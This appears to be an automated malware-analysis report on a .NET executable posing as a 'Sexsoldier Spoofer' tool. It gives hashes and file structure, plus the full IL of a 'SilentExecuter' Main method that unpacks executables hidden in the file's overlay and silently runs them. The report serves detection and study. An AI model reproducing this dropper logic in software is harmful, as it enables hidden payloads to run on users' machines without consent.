Suspicious
Suspect

d33faae831659662d5fceaee4bf97cc3

PE Executable
MD5: d33faae831659662d5fceaee4bf97cc3
Size: 4.56 MB
application/x-dosexec
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
Hash Value
MD5
d33faae831659662d5fceaee4bf97cc3
Sha1
eea366a554b08743adf046b41833b699b954212f
Sha256
7ae5c0db3e68a6b6daf70ae0c7eeeb2e07eb2d1b808f9656462759bfdafe835b
Sha384
5a9a759c7aacc15b5096792037f019e1943b0ff2ca1c9cc1969aa9f7b1d3bd4459d8eb958b7a333718897a400b3dfaa4
Sha512
4209e31adbf8e5e24a80e709edff990ab184baed14058d510e92c0d5b9156b3ecaba4e0e1db07419f912c66ab396d5f0da88876a0d137d7968e290922895bc6f
SSDeep
98304:/FACLB4+2La9ec+xKdOEykp8vUQvBcUnxV3RlprqlA:drgLKecykp8vUiBHx1RlUlA
TLSH
E526230223EA03D6E06F5D79C5B64999E2F6B471C764CEBF628401298E67FF04DB6306

PeID

.NET executable
MASM/TASM - sig4 (h)
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
Overlay_bdfdc933.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information

Info: PE Detect: PeReader OK (file layout)
Info: Overlay extracted: Overlay_bdfdc933.bin (4549554 bytes)
Module Name: Sexsoldier Spoofer.exe
Full Name: Sexsoldier Spoofer.exe
EntryPoint: System.Void SilentExecuter.Program::Main()
Scope Name: Sexsoldier Spoofer.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Sexsoldier Spoofer
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 2
Main Method: System.Void SilentExecuter.Program::Main()
Main IL Instruction Count: 245

Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{2EEFEEFE-58A5-4A2E-840D-1DFB2CB47221}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 
<null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_023E: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_023E ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_023E: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_023E ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_023E: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01F1: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s 
V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.s V_15 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_15 ldstr .exe ldc.i4.5 <null> callvirt System.Boolean System.String::EndsWith(System.String,System.StringComparison) brfalse.s IL_01EB: ldloc.s V_11 ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_0206: ldloc.1 ldloc.3 <null> brfalse.s IL_0205: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0220: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void 
SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0210: ldloca.s V_26 leave.s IL_0239: leave.s IL_023E ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_023E: ret pop <null> leave.s IL_023E: ret ret <null>
